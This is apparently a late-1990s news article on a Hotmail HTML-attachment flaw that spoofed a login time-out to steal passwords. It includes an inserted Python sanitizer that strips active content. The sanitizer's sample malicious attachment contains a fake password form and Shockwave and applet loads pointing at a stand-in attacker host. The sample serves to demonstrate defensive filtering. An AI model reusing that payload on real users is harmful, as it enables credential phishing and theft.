Another Freemail Security Flaw

The security of free email services has come under scrutiny in light of several serious holes discovered during the past week. By Michael Stutz.

A Canadian Web developer reported another security vulnerability in free, Web-based email services on Monday, the third in a week.

"We're issuing a general alert that Hotmail users should, under no circumstances, view their email attachments, because they're handled insecurely by Hotmail," said Web developer Tom Cervenka, who created, then reported, the exploit.

Dubbed Attackments, the vulnerability centers on HTML attachments. A Macromedia Shockwave file accompanying the attachment spoofs a Hotmail time-out message, duping the user into re-entering his username and password, which are then emailed back to a cracker. Because the attachment is rendered inside the user's Hotmail session, the forged prompt appears within the real site rather than on a separate page.

"Right now, all we're really saying is [that] we're aware of the problem, and we're looking into it," said Hotmail spokesman Peter Ross. He said he did not know when the problem would be fixed.

Cervenka and fellow programmer Cody Kostiuk wrote a Shockwave demonstration to verify the vulnerability.

"The way it works is when a user views an HTML attachment, the Shockwave replaces the user interface controls with new controls that are completely in the control of the malicious user, who can use them in any way," Cervenka said.

The principle behind this Shockwave-powered vulnerability is the same as that behind the JavaScript- and Java-based vulnerabilities Cervenka reported last week. The problem derives in part from the fact that free Web-based email services don't filter active content (JavaScript, Java applets, Shockwave objects) out of HTML mail and attachments before rendering them in the logged-in user's session.
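The filtering that the paragraph above says these services lacked is, in practice, an allowlist sanitizer: parse the HTML, keep only known-harmless tags and attributes, and drop active-content elements (`script`, `applet`, `object`, `embed`, `iframe`) together with their contents, plus `on*` event handlers and `javascript:` links. The following is an added example written for this page, not Hotmail's code nor Cervenka's demonstration; the sample attachment is constructed from the article's description (a Shockwave object and a script that swaps the page for a fake "session timed out" login form), and the `attacker.example` and `example.com` hosts in it are placeholders. It uses only the Python standard library.

```python
"""Allowlist HTML sanitizer for Web-mail attachments (added example, not a real service's code)."""
from html.parser import HTMLParser
from html import escape

# Tags safe to render inline. Anything not listed is either dropped with its
# contents (active content, below) or "unwrapped": the tag goes, its text stays.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "h1", "h2", "h3", "table", "tr", "td", "th", "div", "span"}
# Active-content containers: the element AND everything inside it is removed.
DROP_WITH_CONTENT = {"script", "style", "applet", "object", "embed", "iframe",
                     "frame", "frameset", "form", "noscript"}
# Elements that never carry content, so they must not open a suppression scope.
VOID_TAGS = {"br", "hr", "img", "embed", "input", "meta", "link", "param"}
ALLOWED_ATTRS = {"a": {"href"}, "td": {"colspan"}, "th": {"colspan"}}
SAFE_SCHEMES = ("http:", "https:", "mailto:")


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []       # rebuilt, sanitized HTML fragments
        self.suppress = 0   # nesting depth inside a dropped element
        self.dropped = []   # audit trail of removed tags/attributes

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.dropped.append(tag)
            if tag not in VOID_TAGS:
                self.suppress += 1      # swallow content until the matching end tag
            return
        if self.suppress:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)    # unwrap: keep inner text, drop the tag
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):   # onload=, onclick=, ... are script
                self.dropped.append(f"{tag}@{name}")
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not (value or "").strip().lower().startswith(SAFE_SCHEMES):
                self.dropped.append(f"{tag}@href={value}")   # javascript:, data:, ...
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)    # <embed .../> and <br/> forms
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if tag in DROP_WITH_CONTENT:
            if self.suppress:
                self.suppress -= 1
            return
        if self.suppress or tag not in ALLOWED_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.suppress:
            self.out.append(escape(data, quote=False))


def sanitize_html(html_text):
    """Return (sanitized_html, list_of_dropped_items)."""
    s = Sanitizer()
    s.feed(html_text)
    s.close()
    return "".join(s.out), s.dropped


# Constructed sample attachment (hypothetical hosts), modelled on the article:
# a Shockwave object plus a script that repaints the page as a fake time-out form.
SAMPLE_ATTACHMENT = """<html><body onload="steal()">
<p>Your photos are <b>attached</b>. Click <a href="http://example.com/photos">here</a>.</p>
<object classid="clsid:166B1BCA-3F9C-11CF-8075-444553540000">
  <param name="src" value="http://attacker.example/timeout.dcr">
  <embed src="http://attacker.example/timeout.dcr" width="600" height="400">
</object>
<applet code="Spoof.class" codebase="http://attacker.example/"></applet>
<script>function steal(){ document.body.innerHTML = '<form action="http://attacker.example/c">Session timed out. Password: <input name="p"></form>'; }</script>
<a href="javascript:steal()">Re-enter your password</a>
</body></html>"""

if __name__ == "__main__":
    clean, dropped = sanitize_html(SAMPLE_ATTACHMENT)
    print(clean)
    print("dropped:", dropped)
```

The parser-based allowlist is deliberate: a regex blacklist that strips `<script>` is defeated by case tricks, nested tags and attribute-level script, whereas here anything not explicitly permitted never reaches the output, and `dropped` gives a log line for detection. Filtering is only half the fix, though; the other half is not rendering attachments inside the mail application's own origin at all, since even sanitized markup shown in the logged-in session can still imitate the service's interface.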

His Trojavan Horse Exploit used a Java applet to do the spoofing and affected Yahoo! Mail, Lycos Mail, MailCity, Eudora Mail, and MailExcite at the time of its discovery last week.

The exploits show what could happen in other areas -- such as corporate email systems -- as new technologies allow email to expand beyond its text-based roots.

"[The Trojavan horse] is significant since all users have to do to be infected is open an email message," said Forrester Research analyst Ted Julian last Friday. "They don't need to save and run an attachment or go to a Web page on the Net."